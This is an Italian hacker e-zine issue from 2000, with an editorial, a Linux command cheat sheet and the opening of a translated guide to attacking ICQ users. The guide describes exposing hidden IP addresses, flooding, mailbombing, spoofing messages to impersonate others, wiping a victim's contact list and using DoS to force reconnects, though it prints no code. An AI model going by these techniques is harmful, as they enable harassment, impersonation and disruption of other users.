Copy Link
Add to Bookmark
Report
Dirtynet 001
____ _ _____ _____ __ __ __ _ ____ _____
| _) \| || () )|_ _|\ \/ /| \| || ===||_ _|
|____/|_||_|\_\ |_| |__| |_|\__||____| |_|Numero "1"
-+-+-+//\\ Rivista numero "1" Dicembre 2000 //\\-+-+-+
::Inizio Disclaimer::
Tutto il contenuto di questo testo è da ritenersi dannoso quindi non applicabile. L'utente è pregato
di non mettere in atto quanto scritto .Esso è solo stato pubblicato per offrire una conoscenza maggiore in ambito
,NON per altri scopi.Il testo non si puo' modificare ne tanto meno vendere senza il consenso dell'autore.Se non si
rispettano le norme l'utente avrà commesso azione illegale.
In questo testo è solamente presente INFORMAZIONE, e l'informazione per legge è LEGALE.
Leggendo queste righe tu ACCETTI I TERMINI descritti, se ci fosse qualcosa di contrario alla tua' mente, esci e cancella questo file.
::Fine Disclaimer::
Grazie per tutto il sostenimento, grazie per l'incitamento, grazie di tutto...
Questo è il numero uno di "DirtyNet" , si puo' trovare ai seguenti siti (per ora):
http://www.hackersat.com
http://www.spyrohack.com
http://www.tankcommandos.org
http://www.hackerzine.org
Non voglio divagare magari riducendo l'interesse principale che da' questo testo che ,ricordo,
è sopratutto la conoscenza in varie categorie.Nessun autore di questo testo si definisce hacker, newbie,
phreaker o altro ...noi siamo tutti stupidi( non stupidi in quel senso che sapete) in qualcosa , se
non conosciamo una tecnica cerchiamo di leggere per apprenderla...Se non siamo all'inizio stupidi
significa che siamo dei geni nati!!Anche kevin Mitnick era stupido in hacking, ma dopo l'impegno ha
colmato il tutto (lasciamo perdere i risultati!) !!
Con questo primo numero non vi introduciamo articoli tanto avanzati, tranne alcuni...
Diciamo che sarebbe superfluo anche ai newbies ma noi iniziamo da zero sempre...per poi arrivare
aa... a?Ma non si sa', quello che vogliamo diventare.
Gli autori non specificati sono al momento ignoti, possiamo dire che li stiamo "cercando".
ATTENZIONE: è vietato postare questo testo tramite newsgroup.
BUONA LETTURA.
sYn^[
Salve a tutti :)
Queste righe solo per dirvi cio' che penso riguardo al debutto di
questa
e-zine... che spero' avra successo, e nella quale spero di poter
inserire
qualche articoletto qua e la'(grazie SYN!), cercando di scrivere cose
modeste ma originali...
dicevo, voglio scrivere quello che mi viene da pensare al riguardo del
debutto di Dirty Net... beh, semplicemente, mi viene da pensare: ho
poco da
insegnare e tanto da imparare, che cacchio scrivo a fare articoli che
saranno per forza di basso livello tecnico?
Io, che non capisco una cippa di Unix... che leggendo un sorgente in C
vengo
percorso da un brivido... perchè lo faccio?
Non è che si tratta solo di presunzione, che sia solo lo sfizio di
scrivere
il proprio nick su un'e-zine di un hacking team esordiente?
No.
Perchè lo faccio?
Beh, perchè è bello. E' bello collaborare con un team per creare
qualcosa
insieme...e poi se è vero che c'è sempre qualcuno che ne sa piu' (ma
MOLTO
DI PIU' :)) di te è altrettanto vero che c'è allo stesso modo sempre
qualcuno che ne sa di meno... io magari oggi non capisco il sorgente
in C
di cui sopra, ma due mesi fa non capivo neanche l'output di netstat...
oggi
c'è qualcuno che non capisce l'output di nestat, e magari dopo aver
letto
qua a che serve netstat si porra' un altro problema... andra' avanti,
continuando ad imparare... perche' non si finisce mai di imparare.
Io conosco i miei limiti, non sono un hacker, ma almeno posso dire
fieramente che non ho mai fatto uno scanning alla cazzo della 12345,
cercando un pollo col server di NetBus... posso dire di non essere un
lamer.
Per ora mi basta questo...
Alla prossima, speriamo presto... e intanto cerchiamo di dare una
ripulita
alla nostra "Dirty Net", la caccia al lamer è sempre aperta :)
byez,
Ghent
-==H@ Team==-
***
ciau webmaster (approposito, quella table dell'anonimyzer è ancora
sballata... tutto bello il resto del situccio, compliments)
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º\/\/\/\/\/\/\/\/\ \/\/\/\/\/\/\/\/\º
º/\/\/\/\/\/\/\/\ INDICE \/\/\/\/\/\/\/\/º
º\/\/\/\/\/\/\/\/\ \/\/\/\/\/\/\/\/\º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º |Titolo| |Autore| º
º º
º º
º --=Hacking=-- º
º º
º [LINUX NO PROBLEM.....................................|sYn^.........] º
º [GUIDA ALL'HACKING DI ICQ.............................|Ghent........] º
º [WAR ON NAPSTER.......................................|To sYn^......] º
º [HACKING IRC - THE DEFINITIVE GUIDE...................|Klider&sYn...] º
º [HACKERS O.3d.........................................|Iannaccone...] º
º [COME FAR SUICIDARE IL ROOT...........................|pIGpEN.(10x).] º
º [WU-FTP 2.4(1) EXPLOIT................................|.............] º
º [FLAT:USI E ABUSI.....................................|Spyro........] º
º [ISTALLAZIONE DI UN FIREWALL..........................|sYn^.........] º
º [INTRODUZIONE AI DENIAL OF SERVICE....................|kEwL.........] º
º [KERNEL E COMPILAZIONE................................|sYn^.........] º
º º
º --=Hacking satellitare=-- º
º º
º [SEMPLICE PROGRAMMAZIONE DI UNA WAFER CARD ............|sYn^........] º
º [ISTRUZIONI PER L'AGGIORNAMENTO DEL RICEVITORE HUMAX IRCI-5400......] º
º º
º º
º --=Phreaking=-- º
º º
º [CELLULAR TELEPHONE ESN EMULATION......................|............] º
º [SEGRETERIE TELEFONICHE................................|mR_bIs0n....] º
º [RICARICARSI IL CELLULARE O ALMENO PROVARCI............|Screener_it.] º
º º
º º
º --=Elettronica=-- º
º º
º [COME RISOLVERE I PROBLEMI DI RFI/EMI GENERATI DAI COMPUTER..LisosYn] º
º º
º --=Riflessione=-- º
º º
º [RIFLETTIAMO SUI NOSTRI DIRITTI........................|A[v]a[t]A[r]] º
º [COMUNICATO HACKLAB-FI SUGLI HACKERSS DAYS.........................] º
º º
º º
--=Illegality=--
º [LA TRUFFA POSTALE.....................................|mR_bIs0n....] º
º [...................................................................] º
º [...................................................................] º
º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º\/\/\/\/\/\/\/\/\/ /\/\/\/\/\/\/\/\/\º
º\/\/\/\/\/\/\/\/\ Autori e membri \/\/\/\/\/\/\/\/\º
º\/\/\/\/\/\/\/\/\/ con rispettive e-mail /\/\/\/\/\/\/\/\/\º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º º
º [sYn^------------------------synarckio1@yahoo.it - syn@hackersat.com] º
º [A[v]a[t]A[r]-------------------------------avatar31@libero.it------] º
º [Screenet_it--------------------------------screener_it@freemail.it-] º
º [Spyro----------------pazzo2000@altavista.it - spyro2600@hotmail.com] º
º [mR_bIsOn-----------------------------------stusciti@yahoo.it-------] º
º [kEwL---------------------------------------kewl@penguinpowered.com-] º
º [Ghent--------------------------------------ghent@hackersat.com-----] º
º [-------------------------------------------------------------------] º
º [-------------------------------------------------------------------] º
º AScii by sYn^]|[ & kEwL º
===ooO===0===Ooo===oOOo===ooO===0===Ooo==--=Hacking=--====ooO===0===Ooo===oOOo===ooO===0===Ooo===
-----------::LINUX NO PROBLEM::-----------
-COMANDI- LAVORO SINTASSI PROCESSI DI LINUX (console)
All'inizio questo file di test mi è servito tempo fa per ripassare bene tutti i comandi di
Linux.
Ho creduto che anche a voi potrebbe essere di aiuto,ho aggiunto infatti anche altre parti
per ampliare l'argomento, come il LESSICO e i CONSIGLI che si trovano in fondo pagina,Buona
Lettura!
Premetto che con questo file di testo sia diffile imparare tutto il sistema operativo ,io
consiglio la lettura a chi ha almeno un minimo di conoscenza e potrebbe servirgli.
<Nomefile> sta per il nome del file che interessa ma in alcuni casi bisogna necessariamente
indicare il percorso ad esempio: /var/log/httpd/access_log.
logout :il processo che chiude i file aperti,termina i processi.
man :avvia le pagine del manuale linux,se cercate la pagina del man del comando date
scrivete man date
xinit : avvia xwindows
startx : avvia il KDE
twm(da xwindows):avvia il gestore di finestre omonimo
pwd : mostra in quale directory siete al momento
ls : elenca i file e altro nella directory corrente
ls -l : elenca i file con dettagli
los -al : elenca anche i file nascosti da linux "." (punto)
cd <directory>: cambia directory
find <directory> -name <filename>:trova il file richiesto in base al nome.
(in directory scrivendo / trovera file in all the sistem)
find<directory> -ctime <filename>:trova il file richiesto in base alla data
find <directory> -size <filename>:trova il file richiesto in base alla dimensione.
locate <filename> : trova velocemente il file in base al nome
whereis <filename>:trova il file e riporta il percorso
grep <parola da trovare> <file o files in cui trovare>:trova file che contengono una parola.
touch <file> : aggiorna il file oppure se il file non esiste lo crea nella directory corrente
rm <file> :cancella il file.Attnzione però è un potente comando!!
mkdir <directoryname> : crea una directory
rm -r <directory> : rimuove directory con tutti i file compresi
cp <file> <directory> : copia il file nella directory specificata
cp <sourcedirectory> <directory> : copia directory
mv <currentname> <newname> :rinomina il file
cat <namefile> :legge il file o anchè piu' di uno
head <namefile> :legge il file ma solo le prime 10 righe
tail <namefile> :legge il file ma solo le ultime righe
vi <namefile> :lo edita e lo modifica
_______________________________________________________________________________________
Comandi vi
modalita' command
l muove a destra
h muove a sinistra
j muove alla linea successiva
k muove alla linea precedente
x cancella un carattere selezionato
d cancella una linea cliccata
a aggiunge il testo al termine della riga selezionata
w+invio salva il file
w <namefile> salva il file con nome
q+invio esce da vi
i attiva la modalita' insert (prima del carattere sotto il cursore)
a attiva la modalita' insert (dopo il carattere sotto il cursore)
modalita' insert
esc attiva la modalita' command
backspace o canc torna indietro o cancella il testo inserito
______________________________________________________________________________________
wc <nomefile> :conta le righe ,i caratteri ,le parole del file specificato
sort <nomefile>:ordina le righe del file specificato
sort +<numerocolenne> -t" " -b <nomefile>:ordina il file in base ai valori contenuti
nella seconda colonna.(-t è il separatore e -b ignora gli spazi bianchi)
split -l <numerolinee> <nomefile> <nomefileinuscita> :divide il file in segmenti di
tante linee quanto indicato.(si possono usare anche i K o MB occupati usando -b con k o m)
diff <nomefile> <nomefileaggiornato> <nome patchfile>:prende due file ;un modello
originale e uno modificato,e come risultato produce un file che contiene le informazionni necessarie a ricostruire il file nuovo usando le informazioni del file aggiornato.
patch <nomefile> <nomepatchfile> : aggiorna il file
compress <nomefile>: comprime il file con un vecchio formato UNIX
uncompress <nomefile>:decomprime il file con un vecchio formato UNIX
zcat <nomefile>| more : legge il contenuto senza doverlo decomprimere
zip <nomefile> :comprime il file
unzip <nomefile>:decomprime il file
bzip2 <nomefile> :comprime il file (miglior rapporto di compressione)
bunzip2 <nomefile>:decomprime il file (miglior rapporto di compressione)
ls -l :mostra l'occupazione del disco dovuta ai file
df : fornisce informazioni sull'occupazione del disco
tar -cvf <nomefiledacreare.tar> <file o directories da archiviare>: archivia i file
tar -xvf <nomefile.tar> : decomprime il file.tar
_____________________________________________________________________________________________
I PROCESSI
<nomefile> &:esegue il programma in background
ctrl + z: ionterrompe il comando
bg <numero processo> :manda il comando inn background
fg <numero processo> :ripristina il comando in foreground
ps: elenca i processi in memoria
kill -l :elenca tutti i segnali che potete mandare con il comando kill
segnale SIGHUP:forza il processo a ricaricare le informazioni
segnale SIGKILL: forza la terminazione del processo..senza scampo!
kill <numero segnale> <numero processo>:manda un segnale kill a un processo
nohup <nomefile> & :evita che il processo venga terminato
nice -n <priorita'> <comando>:cambia la priorita' del processo (20 è il minimo ,-20 è
il massimo)
renice <priorita'> <PID>: abbassa la priorita' del processo
top :visualizza un elenco aggiornato di processi ( per uscire da top premere ctrl+c)
spell <testo>:trova gli errori di battitura (per uscire da spell premere ctrl+d)
spell < <nomefile>:applica spell sul file ,ridinezionando il file al suo STDIN
(il carattere < dirige il contenuto del file alla sua destra ,nello STDIN del comando a
sinistra)
> : è il contrario (il carattere > manda il contenuto del file alla sua sinistra ad esempio:
tail -30 /var/log/httpd/access_log > <nomefile> : inserisce le ultime 30 linee in un file)
___________________________________________________________________________________
___________________________________________________________________________________
Programmazione base shell
Con la vostra shell voi potrete programmare, nel linguaggio shell, degli script che
vi faciliteranno il lavoro.
Ad esempio se ogni giorno dovete conmpiere una serie di azioni e quindi dovete impartire
comandi molto spesso,potreste
creare uno script che faccia tutto questo ,inserendogli i comandi da impartire.
Adesso passo a farvi vedere uno script e poi passo a descriverlo:
#!/bin/csh
echo "saluti a tutti" | mail nostramail@linux.com
grep "Bob" /usr/local/httpd/logs/access_log | tail -l100 | lpr
xterm -e trn &
exit
Finito il lavoro uscite dall'editor ,il vi, e cambiate gli attributi per renderlo
eseguibile : chmod 755 nostrofile.
Per eseguirlo basta richiamare /nostrofile.
Con echo abbiamo posto l'oggetto "saluti a tutti",
attraverso il | (serve perprendere un oggetto e trasferirgli l'azione) abbiamo inviato
l'e-mail con il comando mail,
grep ci restituisce quello che stiamo cercando cioe' "Bob"
tail prende le ultime 100 righe contenenti bob
lpr li invia alla stampa
a xterm viene detto di far partire un programma eseguendolo nella finestra del terminale
e usando l'opzione -e.
Vi consiglio di programmare con la shell sh.
Se non avete capito qualcosa non esitate scrivetemi a synarckio1@yahoo.it, vi rispondero'
al piu' presto.
___________________________________________________________________________________
yppasswd :cambia password (consigliato se siete in ambiete doi rete)
passwd :cambia la password
chsh :cambia la shell che dovrete decidere successivamente
chsh -l :mostra tutti i tipi di shell che si possono scegliere
finger <username> :visualizza informazioni su un utente collegato al sistema
finger <username>@<host> :visualizza informazioni su un utente collegato a un sistema remoto
chfn :permette di aggiungere delle informazioni personali (che veranno visualizzate con finger)
date : riporta la data esatta
uptime :mostra l'ora esatta,gli utenti collegati al sistema,il tempo fda cui il sistema è
attivo e il carico di lavoro sottoposto al sistema
who :permette di vedere gli utenti collegati al computer
alias <nuovonome> <nomecomando>:Cambia il nome del comando cosi che quando lo eseguirete
dovete digitare quello scritto da voi.
export <nomefile>=<directory> :esporta il file nella dorectory specificata
________________________________________________________________________________________
I FILE DOT
presenti nella directory home:
.login e .logout
leggendoli potreste aggiungere qualche riga che posso servirvi,come ad esempio che ad
ogni di questi due processi (login e logout) venga visualizzata la data e l'ora.
.bashrc o .bash_profile
Script della shell che sono eseguiti quando aprite bash.
.plan
Un file che contiene informazioni che il vostro sistema rimandera' a chiunque vi contatti
remotamente.Inseite nel vostro plan le informazioni che volete siano viste dalle persone
che vi cercano remotamente.
.Xdefaults
_______________________________________________________________________________________________
telnet:avvia il programma telnet
telnet <IPadress>:si collega alla macchina specificata
rlogin <IPadress>: se siete fortunati vi troverete nella shell della macchina remota,
altrimenti vi verranno chiesti nome utente e parola d'ordine.
slogin:un programma che permette una forte opera di crittografia dei dati che vengono
inviati(anche il nome utente e password!).Richiede un minimo di configurazione prima di
eseguirlo.
ftp <remote macchine or IPadress>:ftp permette di recuperare file accedendo ad una
macchina remota,se volete collegarvi anonimamente scrivete anonimous (la password è "guest").
Una volta connessi ad un sito ftp potrete usare i comandi cd e ls per navigare.
get <nomefile> :dopo che si è collegati fa il download del file specificato
put <nomefile> :manda un file dalla directory ad un sistema remoto
_________________________________________________________________________________________
POSTA ELETTRONICA
mail
E' disponibile su tutti i sistemi linux ed è un programma gestibile dalla console.Veloce
e non necessita di configurazione.
pine e elm
Sono dei gestori di posta a tutto schermo.Forse pine è piu' potente di elm ma sono fatti
per un utente che desidera avere un client a tutto schermo.
mh
Mail Hander probabilmente e il meno intuitivo programma di posta elettronica ,per usarlo
dovete conoscere prima bene la programmazione della shell,sicuramente un potente client.
procmail
Mail Processor è pensato per gestire sofisticati automatismi nel'elaborazione dei messaggi.
___________________________________________________________________________________________
CONSIGLI: Per contare quanti accessi ci sono stati su un sito dall'ultima vlta che il
file log è stato azzerato , è possibile usare il comando wc -l /var/log/httpd/access_log.
Se non sapete cosa ci sia in un file .tar usate tar -tvf <nomefile.tar>.
Se volete essere dei buoni utenti non usate tar sui file ,ma sulle directory.
Per eseguire piu' comandi usare la seguente sintassi: (<comando1> <comando2> <comando3>) & .
Solo l'utente root ha la possibilita' di aumentare la priorita' di un processo in esecuzione.
Come utenti potete solo
abbassare la priorita' dei vostri processi , quindi attenti a non abbassarla troppo perchè
poi non potrete piu' rialzarla a meno di un intervento di un utente root.
Se non capite che è collegato al sistema,ricordate di usare finger.Potrebbe darvi ulteriori
informazioni su chi sta utilizzando la macchina.
Se volete vedere le variabili d'ambiente che sono gia' impostate nella vostra shell potete
usare il comando "export" senza argomenti.
LESSICO:
Shell:significa "guscio",infatti è un programma che si pone da interfaccia tra l'utente
e il sistema operativo.Le funzioni della shell sono tutte di "mediazione".
Root:radice ,sta ad indicare il livello utente o il ramo delle directory.
Multitasking:il mandare in esecuzione piu' di un solo comando alla volta.
Background: dietro le quinte.
Foreground: in primo piano.
PID: ID del processo.
Hangup:la terminazione del processo a causa dei segnali.
STDIN:connessione d'ingesso per un programma.
STDOUT:connessione d'uscita per un programma.
bash:è un tipo di shell.
console:linea di comando.
Syn^ se alcuni concetti non vi sono chiari scrivetemi a synarckio1@yahoo.it
--------- GUIDA ALL'HACKING DI ICQ -----------
########################################################################################
## Versione 1 # agosto 2000 # al piu' presto aggiunte a riguardo della
versione 2000a ##
########################################################################################
Cosa fare in un paesino sperduto e desolato, all'una di notte?
Semplice, tradurre/adattare/integrare una delle piu' autorevoli guide
all'hacking di ICQ. La storia è sempre la stessa, la documentazione in
inglese abbonda, ma qui da noi è difficile da trovare...
Ok, inizio: premetto che non ho testato tutte le tecniche descritte e
che questa guida è stata scritta prima dell'uscita di ICQ2000, quindi
probabilmente dei bugs del programma sarano stati corretti. Ah,
dimenticavo: io non sono un hacker (almeno per ora ;)), quindi mi scuso con gli
eventuali lettori piu' esperti di me che notassero qualche ingenuità...
in quel caso, aiutaci a migliorare e comunicaci l'errore, te ne saremo
grati (moralmente, beninteso :))
La guida è di facile comprensione, ma se non conosci termini basilari
come "spoofing" o non sai cosa sia un indirizzo IP o una porta (NO, NON
"QUELLE" PORTE! :) ti invito a leggere qualche documento sull'hacking o
su internet in generale - troverai sicuramente qualcosa che faccia al
caso tuo nel nostro sito (www.hackersat.xs3.com).
La guida originale, da me in parte tradotta "pari pari" e in parte
adattata/ampliata, è di Raven, e puo' essere reperita su
http://blacksun.box.sk (da visitare ;)
Ringrazio l'autore per avermi fatto imparare qualcosa, e voi che state
leggendo per aver scaricato questo file... graditi i commenti e le
critiche, naturalmente.
Spero che non inizierete a fregare la password di ICQ o floodare
chiunque (in quel caso, ricordate che non siete certo hackers ne newbies, ma
solo LAMERS - e se vi becco saro' felice di testare la sicurezza del
vostro Pc ;-)). Usate queste informazioni per proteggere voi stessi ed i
vostri amici, ve ne saranno grati: ricordate, se volete impressionare
qualcuno il modo migliore per farlo è proteggerlo, non attaccarlo.
Contenuti
<===============>
Cos'è ICQ?
* Cosa fa ICQ?
* Per cosa è adatto?
* Dove posso trovarlo?
* Prima di leggere questo tutorial
Perchè ICQ è cosi' insicuro?
* Operazioni lato-client
* Scarsa programmazione e beta testing insufficiente
* Altri programmi per l'istant messaging
I cracks
* Cosa sono i cracks?
* Come possono servirmi i cracks per ICQ?
* Come funzionano, e perchè delle cose sono possibili?
* Dove posso trovarli?
* Scoprire l'IP senza i cracks
Flooding
* Vari tipi di flood
* Come funzionano realmente questi programmi?
* Cosa fare quando subisci un flooding
Spoofing
* Cos'è lo spoofing?
* Come posso spoofare eventi di ICQ?
* Come funzionano questi programmi?
* Usare lo spoofing per ******to play pranks on people
* Usare lo spoofing per distruggere il DB di qualcuno
* Proteggersi dalla distruzione del DB
Falle della ICQ homepage
* Cos'è la ICQ homepage?
* Come posso far crashare il client ICQ di qualcuno usando le falle
della ICQ homepage?
* Come posso guadagnare accesso in lettura all'HD di qualcuno
sfruttando le falle della ICQ Homepage?
* Su quali versioni funzionerà?
Trucchi per la funzione di trasferimento file di ICQ
* Come posso mandare a qualcuno un immagine, un file di testo o altro
che sia in realtà un programma eseguibile?
* Perchè cio' accade?
Smascherare gli utenti invisibili
* L'opzione "web-aware"
* Vari trucchi creativi
Scoprire passwords
* Scoprire la pwd dal DB.
* Exploitare la funzione per il recupero della password della ICQ
homepage
Note finali
* Usarlo o non usarlo?
* Far girare ICQ sotto Linux.
* A proposito delle "catene di S.Antonio" di ICQ
Appendice A: Trovare quella piccola porta da solo
* Come farlo?
* Perchè è meglio farlo da solo?
Appendice B: I vantaggi dei cloni Unix di ICQ
* Eliminare l'avvertimento "you were added" (sei stato aggiunto)
* Prendere l'IP e la porta dal client senza bisogno di nessuna patch
* Spoofer di messaggi inclusi
Appendice C: conversione IP ==> UIN da te stesso
* Perchè dovrei volerlo fare?
* Come posso farlo?
Appendice D: Divertirsi con le contact list
* Come posso facilmente cancellare la contact list di qualcuno senza
usare uno spoofer?
* Come posso evitare che qualcuno lo faccia a me?
Appendice E: Trucchi incredibili col protocollo di ICQ
* Che trucchetti posso fare una volta imparato il protocollo di ICQ?
* Dove posso imparare il protocollo di ICQ?
Cos'è ICQ?
==========
ICQ si legge "I Seek You" - Io ti cerco - (piccolo gioco di parole). E'
un programma innovativo inventato dalla Mirabilis (una software house,
poi venduta ad AOL per circa 400 milioni di dollari nel 1998). ICQ ti
permette di vedere se i tuoi amici sono online e di comunicare con loro.
Puoi mandare messaggi, URLs, creare CHAT fra due o + utenti, trasferire
files, mandare cartoline d'auguri, messaggi vocali e molto altro.
Questo tipo di programma viene generalmente chiamato "instant messanger"
(non credo che ci sia bisogno di traduzione :)
Probabilmente ICQ è il migliore in assoluto della categoria, e vanta un
numero stratosferico di utenti. Puoi scaricarlo da www.icq.com o piu'
semplicemente trovarlo sui CD di demo di qualche rivista... è freeware,
ed è disponibile per varie versioni di Windows e per Mac. Per sapere
come farlo girare sotto Linux, dai un'occhiata al capitolo "note finali".
Perchè ICQ è cosi' insicuro?
============================
Principalmente per questi motivi:
A) Troppe operazioni sono fatte dal client (operzioni lato-client)
B) La gente della Mirabilis programma male :)
Lasciatemi spiegare.
Prima di tutto, le operazioni lato-client rendono ICQ piu' vulnerabile
agli attacchi per varie ragioni. Ad esempio lo spoofing dei messaggi.
E' possibile spoofare i messaggi (inviare messaggi che sembreranno
mandati da un altro utente. Ci ritorneremo) con ICQ, perché ICQ riceverà
messaggi da tutti gli IP. Alcuni scelgono di dire al client di mandare i
loro messaggi direttamente ad un altro client, mentre altri preferiscono
mandare i messaggi attraverso il server, quindi ICQ riceverà messaggi
da tutti, non solo dal server.. Se tutti i messaggi fossero stati
mandati attraverso il server, ICQ non avrebbe accettato la ricezione da
nessun altra fonte e spoofare i messaggi ed altri eventi ICQ sarebbe stato
piu' difficile.
Un altro esempio: il prossimo capitolo parla dei cracks per ICQ.
Leggilo e poi torna a questa parte, se non hai idea di cosa siano. Non
bisogna essere guru del cracking per capire che alcune modifiche non
avrebbero potuto essere effettuate se tutte le operazioni fossero state fatte
dai servers ICQ. Ad esempio lo "smascheratore" di IP. Il tuo client ICQ
ha bisogno degli indirizzi IP degli altri per poter loro mandare
eventi. Se cio' fosse stato possibile solo attraverso il server, il tuo
client ICQ avrebbe docuto contattare il server e dirgli di mandare un
determinato evento a questo o quell'UIN, senza ancora sapere l'IP di questo
UIN. Il server, dall'altro lato, sa gli IP di tutti e lo manda al posto
tuo: se fosse cosi' l'unico modo per avere l'IP di qualcuno sarebbe
conquistare l'accesso al server (un po' di difficolta' in piu' rispetto
allo "scarica il crack e applicalo":))
(ndt: credo sia tutto giusto, ma suppongo che se si usassero i server
per qualunque evento di instant messaging o sarebbe tutto terribilmente
lento - e a rischio di privacy, perché qualunque messaggio verso
qualcuno potrebbe essere "letto" dal server... IMHO non è una bella cosa-
opppure sarebbe necessaria una rete di servers ICQ MOLTO ramificata ed
efficiente... e i server costano :))
Un altra pecca di ICQ è lo scarso beta-testing, che ha lasciato la
release distribuita al pubblico bacata... cmq non credete che ICQ sia il
messanger meno sicuro in giro: ad esempio l'MSN messanger (della
Microsoft... strano, eh?) è largamente exploitabile... date un'occhiata alla
Byte Me Page in http://blacksun.box.sk o magari tornate su
www.hackersat.xs3.com piu' in la'... chissà che non troviate una guida in italiano ;))
I cracks
========
Prima di tutto, un crack è in genere un piccolo file eseguibile che
cambia qualcosa in un determinato programma. Ad esempio: converte un
programma shareware (cioè un sw che puo' essere distribuito liberamente ma
con delle funzioni bloccate, o che magari cessa di funzionare dopo un
periodo di prova se non lo registri) in uno completo, come se fosse il
programma acquistato regolarmente.
I cracks per ICQ ti permettono di:
A) Vedere l'indirizzo IP di qualcuno, anche se ha selezionato l'opzione
"don't show my IP" nel menu' delle preferenze.
B) Aggiungere qualcuno nella tua contact list senza bisogno della sua
autorizzazione.
C) Lanciare piu' di un client ICQ allo stesso tempo (per usare
contemporaneamente piu' UINs)
D) Aggiungere te stesso alla tua contact list (questo si rivela utile
nel proteggersi dall'alterazione del DB, leggi il capitolo sullo
spoofing per avere maggiori infomazioni)
Probabilmente il migliore crack-pack per ICQ è IsoaQ. Puoi trovarlo sul
nostro sito (www.hackersat.xs3.com) - SYN^: poi te lo passo - E' facile da
usare, cmq puoi leggere la documentazione allegata al pack.
Flooding
========
Floodare significa, naturalmente, bombardare qualcun altro con valanghe
di messaggi o altri eventi (leggi il book di Syn "impariamo a floodare"
per avere informazioni generiche sul flooding). Ci sono vari modi per
floodare il client ICQ di qualcuno
A) Il primo modo è, naturalmente, cliccare su qualcuno nella tua
contact list, scrivere un messaggio, copiarlo, mandarlo e quindi ricliccare,
incollare e mandare.... naturalmente, è un modo frustrante ed
inefficace.
B) Altrimenti, si puo' usare un flooder già pronto...
Questi flooder soto stati programmati da gente che ha imparato il
protocollo di ICQ da sola esaminando ICQ o installando un falso server sui
loro computer e vedendo come il client comuicava col server, o magari da
qualcuno che ha letto della documentaione in merito e ha deciso di
programmare un flooder. Poi, dei flooders faranno molti piu' dannni:
manderanno tanti messaggi quanti ne decidi di mandare ma invece di mandarli
da un solo UIN li invieranno ognuno da un falso UIN sorgente. In questo
modo la vittima vedrà presto la sua contact list riempirsi di gente che
non conosce e falsi UIN, e si meraviglierà nel vedere che ognuno gli ha
mandato lo stesso messaggio.
Puoi trovare un buon flooder su www.warforge.com (o anche nella sez.
FILEZ del sito, Syn?). Spero che non userai indiscriminatamente questo
genere di tool... e ricorda che usando un programma di quaclun altro
senza sapere come funziona non compi certo un'azione da hacker. Non ti
biasimero' se manderai un 200 messaggi al classico fallito che si presenta
con "hey gay" e continua con "i'm your worst nightmare"... ma pensa
prima di agire, e ricorda che se vuoi evitare questo genere di contatti
puoi semplicemente decidere di non consentire la visualizzazione del tuo
status online/offline.
Cmq, avrai bisogno della porta di ICQ per far funzionare un flooder, di
solito. La porta di ICQ è una porta che ICQ apre e alla quale ascolta.
Sono sempre porte tra la 1024 e la 2000. Devi solo scannare (con un
port scanner, ovvio) questo range di porte impostando un valore di timeout
abbastanza alto, 1-2 secondi.
Visto che questi flooders ad altre "utilità" hanno bisogno della porta
di ICQ per funzionare, potresti aprire varie porte in quel range per
confondere dei lamers che provano a floodarti.
Puoi farlo programmando qualcosa del genere da te, giocherellando con
/etc/inetd.conf o altri files se stai usando Unix, usando Netcat o altri
programmini (sezione filez??)
C) ICQ ha anche una funzione chiamata "Email Express". Supponiamo che
il tuo UIN sia 5917057. Se qualcuno manda un messaggio a 5917057@icq.com
lo riceverai come "Email Express" direttamente nel tuo client ICQ. Ora,
cosa succede se usi un maibomber standard verso questo tipo di
indirizzo? Giusto, questa persona verrà floodata di EmailExpress.
Per proteggerti da queste cose, puoi disabilitare Email Express dal
menu' delle preferenze in ICQ. Ancora una volta, ti invito a non fare
nulla del genere. E ricorda che se non mascheri il tuo IP ed il tuo
indirizzo e-mail saranno entrambi visibili negli headers del messaggio.
Se subisci un flooding, ci sono dei programmi che chiuso il client ICQ
cancelleranno ogni messaggio non letto (attento a non perdere messaggi
importanti in questo modo). Ancora un volta, dai un'occhiata alla
sezione FILEZ (forse, vero Syn?)
Spoofing
========
Ancora, spoofare messaggi ed altri eventi o programmari tools che lo
facciano è possibile imparando il protocollo di ICQ. Il miglior spoofer
si chiama Lame Toy, ed ancora, puoi trovarlo nella sezione filez (Ce li
mettiamo o no, Syn?). Ci si puo' divertire parecchio usando gli
spoofer. Ad esempio: puoi mandare a qualcuno dei messaggi da loro stessi,
dicendo di essere il loro computer, o magari puoi inviare una lettera di
insulti a qualcuno spacciandosi per la sua ragazza (ma non farai nulla
del genere, VERO?:)). Lame Toy puo' anche spoofare altri eventi, come URL
sending o richieste di file transfer, richieste di chat ecc.
Inotre, se mandi a qualcuno un messaggio da se' stesso e lui si
aggiunge alla sua contact list, la volta seguente che aprirà ICQ perderà la
sua intera contact list. Questa viene chiamata "DB corruction", una
alterazione del database (DB) di ICQ che contiene la tua intera contact
list, tutte le tue informazioni e i settaggi personali. E' contenuto in una
subdirectory della ditrectory di ICQ, chiamata DB (nelle versioni piu'
vecchie della 99a), NewDB (in ICQ99a) o DB99b (in ICQ99b).
Se la vittima si è già aggiunta nella sua contact list e vuoi vedere
risultati immediati, puoi sempre mandargli un DoS attack in modo che
debba ricollegarsi alla rete e rilanciare ICQ.
Comunque, questa azione è crudele e i DoS sono illegali, quindi siete
sempre invitati a non farlo (la fine è sempre quella: lamer).
